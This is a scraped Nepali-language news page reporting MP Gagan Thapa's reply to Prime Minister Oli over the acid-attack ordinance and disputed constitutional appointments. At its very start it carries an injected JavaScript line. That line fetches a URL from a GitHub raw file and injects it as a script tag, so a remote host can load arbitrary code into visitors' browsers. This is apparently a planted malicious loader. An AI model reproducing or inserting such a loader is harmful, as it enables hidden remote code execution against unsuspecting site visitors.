;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); प्रधानमन्त्रीलाई गगनको जवाफः असंवैधानिक नियुक्तिको विरोध गर्दा एसिड आक्रमण विरुद्धको अध्यादेश फेल गर्न खोजे भनेर झुट पिट्ने ? – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • प्रधानमन्त्रीलाई गगनको जवाफः असंवैधानिक नियुक्तिको विरोध गर्दा एसिड आक्रमण विरुद्धको अध्यादेश फेल गर्न खोजे भनेर झुट पिट्ने ?
देश/प्रदेश

प्रधानमन्त्रीलाई गगनको जवाफः असंवैधानिक नियुक्तिको विरोध गर्दा एसिड आक्रमण विरुद्धको अध्यादेश फेल गर्न खोजे भनेर झुट पिट्ने ?

फागुन २५,

काठमाडौं । नेपाली कांग्रेसका युवा नेता तथा सांसद गगन थापाले प्रधानमन्त्री ओलीले एसिड आक्रमण र महिलामाथि हुने हिंसाविरुद्धका अध्यादेश पास हुन नदिनको लागि संसद् अबरुद्ध गरेको भनको प्रति आक्रोश पोखेका छन् ।

मंगलबार टुवीट् गर्दै सांसद थापाले संवैधानिक परिषद सम्बन्धी अध्यादेश ल्याएर असंवैधानिक नियुक्ति गर्ने,त्यसको विरोध गर्दा एसिड आक्रमणविरुद्धको अध्यादेश फेल गर्न खोजे भनेर डंका पिट्ने, झुट प्रधामनमन्त्री ज्यू भनेका छन् ।

त्यस्तै थापाले आफूहरु एसिड आक्रमण र महिलामाथि हुने हिंसाविरुद्धका अध्यादेश अझ सुधार गरेर कानून बनाउन सदनमा प्रतीक्षारत भएको उल्लेख गरेका छन् ।

फेसबुक प्रतिक्रियाहरु